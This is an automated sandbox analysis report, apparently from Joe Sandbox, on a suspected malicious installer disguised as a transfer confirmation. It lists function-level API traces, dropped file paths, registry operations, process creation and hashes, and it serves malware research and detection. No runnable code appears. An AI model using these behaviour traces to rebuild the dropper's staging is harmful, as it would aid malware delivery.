Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: "C:\Users\user~1\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac"$C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor
API String ID: 1941528284-3300110800
Opcode ID: 684cf647b502b8cea27ec51f3a74b93e11290c925dea9a009321a0283d18598e
Instruction ID: 10c9bfb48ac22d70b7a6fd4bf6847715cc6e5200bae8767ad0241ecc3b8f07ee
Opcode Fuzzy Hash: 684cf647b502b8cea27ec51f3a74b93e11290c925dea9a009321a0283d18598e
Instruction Fuzzy Hash: 6841B172904519BACF10BBB5CC86DAF7679EF05329F20463BF521B11E1D63C8A41CA6E

Function 00405192 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Strings

Completed, xrefs: 004051B3, 004051C3, 004051C9, 004051EC, 004051F8

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Completed
API String ID: 2531174081-3087654605
Opcode ID: 48b19a34b63cb90607c45f1125da49094336e2c299eab4fbc02cedcd7faf0acf
Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
Opcode Fuzzy Hash: 48b19a34b63cb90607c45f1125da49094336e2c299eab4fbc02cedcd7faf0acf
Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8

Function 0040317B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403190

Part of subcall function 0040330D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
WriteFile.KERNELBASE(0040BE78,00411E35,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
SetFilePointer.KERNELBASE(001350F5,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF

Strings

habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 004031F0, 004031F6

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
API String ID: 2146148272-2559241417
Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
Instruction ID: 37036d35f8974e55ed68100cf34a45723990335e8d7a2adc0945050858e8c70a
Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
Instruction Fuzzy Hash: 7D41CB725042019FDB10DF29ED848A63BACFB54356720827FE910B22E1D7B99D41DBED

Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,?,?,771B2EE0,00405790,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe"), ref: 004059EC
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09

CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen,?,00000000,000000F0), ref: 00401630

Strings

C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen, xrefs: 00401623

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen
API String ID: 3751793516-3354442963
Opcode ID: 77a50746faaf70f481261059f09a464f58bc4f4b68c75f239c42b854978f3346
Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
Opcode Fuzzy Hash: 77a50746faaf70f481261059f09a464f58bc4f4b68c75f239c42b854978f3346
Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E

Function 0040638E Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 00406398

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID:
String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
API String ID: 0-2559241417
Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44

Function 00402B78 Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B99
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
RegCloseKey.ADVAPI32(?), ref: 00402BDE
RegCloseKey.ADVAPI32(?), ref: 00402C03
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 5dde48613cb83d0adfaafee1501ae70c9f94bc296712e9edd69c2eafcb4792e1
Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
Opcode Fuzzy Hash: 5dde48613cb83d0adfaafee1501ae70c9f94bc296712e9edd69c2eafcb4792e1
Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69

Function 00403060 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
WriteFile.KERNELBASE(00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,?,000000FF,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113

Strings

habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 004030DC, 004030F3, 0040310F

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: File$PointerWrite
String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
API String ID: 539440098-2559241417
Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9

Function 00405B83 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405BA1
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403356,1033,C:\Users\user~1\AppData\Local\Temp\), ref: 00405BBC

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405B88, 00405B8C
nsa, xrefs: 00405B90

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
API String ID: 1716503409-3083371207
Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64

Function 0040232F Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
RegSetValueExW.KERNELBASE(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: 4180e4ab82bff7ff89890fe0cd785ffe3c04f71f059799902af0cb5b0267beb0
Instruction ID: 4c75d48ff27920bf3256dab6d3d18bc6d0e5d26c1911ded3a9e9fdbcc9a4e390
Opcode Fuzzy Hash: 4180e4ab82bff7ff89890fe0cd785ffe3c04f71f059799902af0cb5b0267beb0
Instruction Fuzzy Hash: 89118EB1A00108BEEB10AFA4DE4AEAF777CEB54358F10043AF504B61D0D7B86E419B69

Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Part of subcall function 00405663: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: b9acc33138c3e4e902b3b85438cd98049fdd0351d6a83afd457270008e50ac81
Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
Opcode Fuzzy Hash: b9acc33138c3e4e902b3b85438cd98049fdd0351d6a83afd457270008e50ac81
Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A

Function 00405663 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
CloseHandle.KERNEL32(?), ref: 00405695

Strings

Error launching installer, xrefs: 00405676

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79

